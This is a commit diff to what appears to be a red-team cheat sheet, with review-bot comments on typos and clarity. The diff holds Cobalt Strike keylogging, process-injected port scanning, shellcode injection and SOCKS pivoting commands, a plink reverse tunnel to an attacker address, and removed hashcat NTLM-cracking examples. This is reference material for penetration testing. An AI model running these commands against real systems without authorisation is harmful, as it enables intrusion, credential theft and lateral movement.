GitBook: [#3374] No subject
This commit is contained in:
parent
cfc7ef0b3f
commit
268d48c250
@ -49,6 +49,10 @@ screenwatch # Take periodic screenshots of desktop
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
# portscan
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
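Review bot: placeholder notation is inconsistent within this hunk: `keylogger [pid] [x86|x64]` spells out the architecture choice while `portscan [pid] [arch] ...` uses the bare word `[arch]`; pick one form for both. The second `portscan` form (the one without `[pid]`) also has no trailing comment, unlike the injected form above it; a short comment saying how it differs from the injected form (no target process is given) would make the distinction explicit for readers skimming the cheat sheet.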
@ -158,4 +162,10 @@ shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x6
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode</code></pre>
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
# Pivoting
## Open a socks proxy in the teamserver
beacon> socks 1080
</code></pre>
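Review bot: the line `## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode` appears twice in this hunk, first with `</code></pre>` glued onto its end and then again without it. Since the rendered diff has lost its `+`/`-` markers this is most likely the old closing line being replaced so that the block can be extended down to the new `# Pivoting` section, but check that the resulting file keeps exactly one copy and that the block's single `</code></pre>` now sits after `beacon> socks 1080`. Two typos in the added comment lines: `Fenerate` should be `Generate`, and `cobalt srike` should be `Cobalt Strike` (both occurrences).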
@ -621,21 +621,6 @@ hash-identifier
> <HASH>
```
### Wordlists
* **Rockyou**
* ****[**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)****
* ****[**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)****
* ****[**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)****
### **Wordlist Generation Tools**
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configureable basechars, keymap and routes.
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
### John mutation
Read _**/etc/john/john.conf**_ and configure it
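Review bot: this hunk removes the `### Wordlists` and `### Wordlist Generation Tools` material (`-621,21 +621,6`); if it is being moved rather than dropped, carry two fixes to the destination: the list items are wrapped in empty bold markers (`* ****[**Probable-Wordlists**](...)****`), which render as stray asterisks, and `configureable` in the kwprocessor description should be `configurable`. The commit message (`No subject`) does not say where the content went, so a one-line pointer in the page or the commit to the new location would help readers who follow the old anchors.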
@ -647,78 +632,6 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
### Hashcat
#### Hashcat attacks
* **Wordlist attack** (`-a 0`) with rules
**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
* **Wordlist combinator** attack
It's possible to **combine 2 wordlist into 1** with hashcat.\
If the list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the rpevious example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
* **Mask attack** (`-a 3`)
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack decalring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where ?1 is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
#### Hashcat modes
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
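Review bot: the Hashcat section removed by this hunk (`-647,78 +632,6`) carries several defects that should not be re-introduced wherever it lands: `combine 2 wordlist into 1` should read `2 wordlists`; `rpevious` should be `previous`; `decalring` should be `declaring`; the `-a 6`/`-a 7` examples use the path `\wordlist.txt` (the root of the current drive on Windows) while every other example on the page uses `.\` relative paths; and `hashcat --help #will show the charsets and are as follows` is a run-on that the charset table directly below it then restates. As with the previous hunk, the commit does not say where this content moved, so a pointer from the old location would help.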
@ -23,6 +23,12 @@ _A **digital transformation** tailored to your organization is unique. It also c
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Nmap tip
{% hint style="warning" %}
**ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.
{% endhint %}
## **Bash**
**Host -> Jump -> InternalA -> InternalB** 
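Review bot: the new Nmap hint states the rule but not the reason. A SOCKS proxy relays TCP connections made through connect(), so anything Nmap builds as raw packets (ICMP echo for host discovery, the half-open SYN of the default scan) never enters the tunnel; that is why `-Pn` and the full-connect `-sT` are required. Adding that one sentence makes the warning self-explanatory and keeps readers from assuming a different proxy type would change the answer. Minor: the added heading `## **Bash**` nests bold inside a heading, which the neighbouring headings (`## Nmap tip`) do not.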
@ -127,7 +133,7 @@ Local port --> Compromised host (active session) --> Third\_box:Port
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
```
### Port2hostnet (proxychains)
### SOCKS
```bash
background# meterpreter session
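Review bot: `### Port2hostnet (proxychains)` and `### SOCKS` sit on consecutive lines with nothing between them. As a one-line-for-one-line hunk (`-127,7 +133,7`) this is almost certainly the old heading being renamed to the new one with the renderer having dropped the `-`/`+` markers, but confirm that only `### SOCKS` remains in the file; otherwise the page gains an empty section. Separately, `background# meterpreter session` needs a space before `#` so it reads as a command followed by a comment rather than a single token.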
@ -152,6 +158,20 @@ run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
```
## Cobalt Strike
### SOCKS proxy
Open a port in the teamserver listening in all the interfaces that can be used to **route the traffic through the beacon**.
```bash
beacon> socks 1080
[+] started SOCKS4a server on: 1080
# Set port 1080 as proxy server in proxychains.conf
proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
```
## reGeorg
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
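Review bot: the exposure of the listener is missing from the new `### SOCKS proxy` section. `socks 1080` starts an unauthenticated SOCKS4a server (the hunk's own output line reads `started SOCKS4a server on: 1080`) and the text says it listens on all interfaces, so anyone who can reach the teamserver on that port can route traffic into the pivoted network; the section should say that the port must be restricted to the operator's address (host firewall or an equivalent bind restriction) for the lifetime of the engagement. The comment `# Set port 1080 as proxy server in proxychains.conf` should also say which host goes in the config: `127.0.0.1` only works when proxychains runs on the teamserver itself, otherwise it is the teamserver's address. Wording: `listening in all the interfaces` should read `listening on all interfaces`.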
@ -305,6 +325,12 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
```
## Proxify Windows GUI Apps
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
In **Profile -> Proxy Servers** add the IP and port of the SOCKS server.\
In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify.
## NTLM proxy bypass
The previously mentioned tool: **Rpivot**\
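Review bot: the added `## NTLM proxy bypass` section is a stub as far as this hunk shows: it ends on `The previously mentioned tool: **Rpivot**\`, and the trailing `\` forces a hard line break into nothing. If no text follows outside the hunk context, either finish the section (`previously mentioned` refers to a section not visible in this diff, so at least name what Rpivot is used for here) or hold the heading back until there is content. The Proxifier paragraph is fine; its trailing backslashes are the same GitBook hard-break convention the rest of the page uses.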